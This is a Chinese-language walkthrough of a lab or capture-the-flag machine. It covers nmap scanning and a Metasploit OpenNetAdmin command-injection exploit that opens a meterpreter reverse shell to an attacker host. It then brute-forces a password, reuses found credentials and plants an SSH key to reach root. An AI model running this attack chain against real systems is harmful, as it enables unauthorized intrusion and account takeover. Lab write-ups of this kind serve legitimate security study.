目录
Nmap:
1.存活探测:
nmap -sn 192.168.20.1/24
2.端口探测:
nmap -sS -p- 192.168.20.131
3.服务探测:
nmap -sVC -p 22,80,10000 -O --version-all 192.168.20.131
这里发现 10000 端口也是http服务。
服务漏扫:
nmap -p 22,80,10000 --script=vuln 192.168.20.131
因为 前面我们探测 10000 端口是http服务,所以这里对 10000 的扫描结果是不对的。
我们看到 80 端口的有个 /robots.txt 君子协议。
Web打点:
访问 http://192.168.20.131 什么都没有,,看看君子协议。
发现目录,访问该目录:
http://192.168.20.131:10000/ 是有页面显示,告诉我们要 https 访问。
这里只能尝试爆破和sql注入均无果,,还是回到80端口尝试。
标题发现:OpenNetAdmin :: 0wn Your Network 这是一款 网络管理器。
exp->shell:
这里发现 msf 的命令注入利用脚本,和RCE远程命令执行脚本。
我们直接利用msf更快一点。
msf6 > search opennetadmin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/opennetadmin_ping_cmd_injection 2019-11-19 excellent Yes OpenNetAdmin Ping Command Injection
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/opennetadmin_ping_cmd_injection
msf6 > use 0
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set lhost 192.168.20.128
lhost => 192.168.20.128
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set rhost 192.168.20.131
rhost => 192.168.20.131
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > show options
Module options (exploit/unix/webapp/opennetadmin_ping_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.20.131 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /ona/login.php yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 t
o listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.20.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.20.128:4444
[*] Exploiting...
[*] Sending stage (1017704 bytes) to 192.168.20.131
[*] Meterpreter session 1 opened (192.168.20.128:4444 -> 192.168.20.131:32810) at 2024-04-16 14:48:04 +0800
[*] Command Stager progress - 100.00% done (706/706 bytes)
meterpreter >
拿到shell,我们弹一个稳定的shell。
提权:
在reports目录中,发现了 .htaccess 隐藏文件
告诉我们密码大概是10位数,字符均是 aefhrt 这几个字符里面的。
crunch生成密码:
爆破出来账密:
douglas/fatherrrrr
SSH:
直接ssh登录,这里是想办法登录更高权限的jen,我们这里发现了公钥,
我们将公钥拷贝进jen的用户目录下。
cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh
ssh jen@192.168.52.132
发现一封邮件,去看看。
可以看到moss用户的密码是Fire!Fire!
发现脚本文件,查看是乱码,,我们直接运行即可提权为root。